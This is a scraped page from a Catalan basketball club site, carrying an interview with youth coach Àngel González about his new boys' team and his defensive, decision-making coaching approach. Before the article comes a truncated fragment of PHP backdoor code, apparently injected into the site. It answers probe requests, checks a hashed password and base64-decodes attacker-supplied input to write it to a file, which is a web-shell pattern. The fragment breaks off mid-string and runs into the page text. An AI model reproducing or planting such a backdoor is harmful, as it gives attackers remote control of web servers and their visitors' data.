function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Àngel González: "En aquestes categories el jugador ha de ser més egoista" - Tgn Bàsquet Club -

Àngel González: “En aquestes categories el jugador ha de ser més egoista”

By
Updated: agost 18, 2014

Un salt enorme. Àngel González (28 anys i segona temporada al TGN Bàsquet) ha passat en un any d’entrenar el sènior femení B a fer-ho en l’infantil masculí A. Per ell és un retorn als orígens, doncs sempre s’ha mogut en categories de formació, el que més li agrada. Assegura que en aquestes edats els jugadors han de prendre decisions per ells mateixos amb la pilota a les mans i lamenta la marxa de tres jugadors de l’any passat en vista a aquest curs.

– Deu n’hi do quin canvi, oi?

– Sí, l’any passat entrenava el sènior femení B i ara dirigiré l’infantil masculí A. Tradicionalment sempre he portat equips masculins i en categories de formació, des d’aleví fins a cadet. Particularment m’agrada més el tema de formació.

– Coneix el seu nou equip?

– Sí, formo part de la part de tecnificació de la Federació Catalana de Bàsquet i molts dels jugadors han passat per la tecnificació.

– Quin estil de joc tindrà el seu grup?

– Lamentablement hem perdut tres jugadors importants en relació a l’any passat i això ha fet que, un cop analitzat el grup que tenim, hem decidit fer un equip de córrer, de lluitar, de ser el més dur possible, amb molta intensitat.

– Aquestes pèrdues que comenta [han marxat a un altre club] li han trastocat molt els plans?

– Bé, l’objectiu inicial és formar jugadors. Amb tot, com teníem molt talent acumulat, el nostre desig era classificar-nos pel nivell A1 [a partir del gener], amb això millores els entrenaments durant la setmana perquè com que el nivell competitiu és més alt, també pots exigir més. Tot i les baixes abans esmentades, mantenim el desig de ser a A1, sinó, mirar de ser a A2.

– Què voldria que els seus jugadors haguessin après en finalitzar el curs?

– Intentaré inculcar hàbits defensius. Per crèixer com a jugadors i com a equip és imprescindible millorar la part defensiva, sense oblidar l’ofensiva, és clar.En aquestes categories els jugadors han de ser més egoistes, qui té la pilota ha de manar. Ja arribarà el moment en què l’entrenador situïi cada jugador al seu lloc i li demani un treball en concret. Ara és el moment perquè es prenguin decisions individuals, el moment en què qui tingui la pilota valori quina és la situació i què és allò que cal fer, si penetrar, llençar, passar, etc.

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *